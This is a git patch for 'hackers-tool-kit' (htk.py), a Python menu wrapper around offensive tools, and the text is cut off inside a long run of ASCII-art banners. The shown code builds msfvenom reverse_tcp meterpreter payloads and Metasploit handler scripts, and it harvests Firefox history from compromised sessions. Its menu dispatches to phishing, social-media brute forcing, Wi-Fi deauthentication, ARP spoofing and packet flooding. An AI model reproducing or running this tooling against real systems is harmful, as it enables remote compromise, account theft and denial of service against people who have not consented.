os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') - os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) - os.system('echo "exploit\n" >> phpload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r phpload.rc') - os.system('rm -rf phpload.rc') - if yn == "n": - os.system('echo " "') -#---------------# -#PHP PAYLOAD END# - - -#PYLOAD START# -#------------# -def pyload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> pyload.rc') - os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') - os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) - os.system('echo "exploit\n" >> pyload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r pyload.rc') - os.system('rm -rf pyload.rc') - if yn == "n": - os.system('echo " "') -#----------# -#PYLOAD END# - - -#FOXHIS START# -#------------# -def foxhis(): - os.system('echo "sessions\n" >> foxhisses.rc') - os.system('echo "exit\n" >> foxhisses.rc') - os.system("service postgresql restart") - os.system('msfconsole -q -r foxhisses.rc') - os.system('rm -rf foxhisses.rc') - print "\n" - ses = raw_input("Session: ") - print "\nMaximum time (seconds) to wait for a response\n" - time = raw_input("Timeout: ") - os.system('echo "use firefox/gather/history\n" >> foxhis.rc') - os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) - os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) - os.system('echo "run\n" >> foxhis.rc') - os.system('msfconsole -q -r foxhis.rc') - os.system('rm -fr foxhis.rc') -#----------# -#FOXHIS END# - - -#RHAWK START# -#-----------# -def rhawk(): - os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") -#---------# -#RHAWK END# - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - if x == "phpload": - phpload() - if x == "pyload": - pyload() - if x == "foxhis": - foxhis() - if x == "rhawk": - rhawk() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 4a7dc85327806e09be9cc9529ec56c4dd0eacd1c Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 29 May 2019 03:51:38 +0100 Subject: [PATCH 163/214] Add files via upload --- htk.py | 3130 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 3130 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..87fabe0 --- /dev/null +++ b/htk.py @@ -0,0 +1,3130 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#WARNING START# +#-------------# +from tkinter import * +win = Tk() +warn ='I AM NOT RESPONSIBLE FOR ANY DAMAGE CAUSED WITH THIS TOOL WHATEVER YOU DO WITH THIS TOOL IS ON YOU' +messageVar = Message(win, text = warn) +messageVar.config(bg='red') +messageVar.pack( ) +win.title('HTK: Warning!') +button = Button(win, text='OK', width=25, command=win.destroy) +button.pack() +win.mainloop() +#-----------# +#WARNING END# + +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """ + type ? for help +\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + type ? for help + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + + type ? for help + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + type ? for help + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner8(): + print """ + type ? for help\033[91m + +@@@ /$$ /$$ @@@ +@@@ | $$ | $$ @@@ +@@! | $$ | $$ @@! +!@! | $$$$$$$$ !@! +!!@ | $$__ $$ !!@ +!!! | $$ | $$ !!! +!!: | $$ | $$ !!: +:!: |__/ |__/ :!: +@@@ @@@\033[94m +@@@ @@@ +@@! @@! +!@! /$$$$$$$$ !@! +!!@ |__ $$__/ !!@ +!!! | $$ !!! +!!: | $$ !!: +:!:---------------| $$---------------:!: +@@@ | $$ @@@ +@@@ | $$ @@@ +@@! |__/ @@! +!@! !@!\033[91m +!!@ !!@ +!!! /$$ /$$ !!! +!!: | $$ /$$/ !!: +:!: | $$ /$$/ :!: +@@@ | $$$$$/ @@@ +@@@ | $$ $$ @@@ +@@! | $$\ $$ @@! +!@! | $$ \ $$ !@! +!!@ |__/ \__/ !!@ +!!! !!! +!!: !!: +:!: :!:\033[92m + :: :: +: @tuf_unkn0wn :\033[0m +""" +def mainbanner9(): + print """ +\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ +║ ║ +\033[33m║ ║ +║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ +\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ +║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ +\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ +║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ +\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ +║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ +\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ +║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ +\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ +║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ +\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ +║\033[0m █ ▐ ▀ █ ▐ \033[95m║ +\033[35m║\033[0m ▐ ▐ \033[35m║ +║ ║\033[1;31m +╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m + type ? for help + """.decode('utf-8') + +def mainbanner10(): + print """\033[0m + ░░░▓█▒░▒▒▒▓▓░ + ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ + ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ + ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ + ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ + ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ + ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ + ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ + ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ + ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ + ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ + ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ + ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ + ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ + ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ + ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ + ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ + ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ + ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ + ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ + ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ + ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ + ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ + ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ + ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ + ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ + ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ + ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ + ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ + ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ + ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ + ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ + ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ + ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ + ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ + ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ + ░█▓▓▓▓▓▓███████▓██▓██░ + ░██▓▓▓████████████████░░░ + ░▓▓▓▓▓███████▓█▓████████░ ░░░ + ░░░█▓█████████████████████████▓▓▓▒░░░░░░ + ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ + ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ + ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ + ░░▓█▓█▓█████████████████████████████░░ + \033[0m""".decode('utf-8') +def mainbanner11(): + print """\033[91m + ██████╗ ██████╗ ██████╗ + ██╔════╝ ██╔════╝ ██╔════╝ + ███████╗ ███████╗ ███████╗ + ██╔═══██╗██╔═══██╗██╔═══██╗ + ╚██████╔╝╚██████╔╝╚██████╔╝ + ╚═════╝ ╚═════╝ ╚═════╝ + ░░░░ ░░░░░ + ░▒███████▓▒░░ ░░░████████▓░░░ + ░▓████████████▒░░ ░░█████████████░░ + ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ + ░ ░██████▒░ ░░░░███████ ░░ + ░░███████░░ ░░██████▓░ + ░███████░░ ░▒██████▒ + ░░░░ ░░███████░░░███████▒░ ░░░ + ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ + ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ + ░▒██████████████▒████████▒██████████████░░ + ░░██████████████▒░███▒▒▒█████████████░░ + ░░░░▓████████░█░▓▓▒████████▒░░░░░ + ░░████████▓░██░████████▒░░░ + ░░▒██████░▒▒░░▒░░██████░ + ░░█████████▓░█░████▓███▓░ + ░▒█▓░▒██████▒███████░░█▓░ + ░░░███████████████████▓░░ + ░▒▓████████████████▒░ + ░░▒███████████████▓▒░ + ░▒█████▓██████░░ + ░██████████░ + @tuf_unkn0wn ░█████████▒ type ? for help + █████████░░ + ░░████████░░ + ░▓█████▓░ + ░▓████▒░ + ░░████░ + ░░░▒██░░ + ░█▓░ + ░░▓░░ + ░░░░░ + ░░ + \033[0m""".decode('utf-8') +def mainbanner12(): + print """\033[91m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner13(): + print """\033[92m + + +██╗ 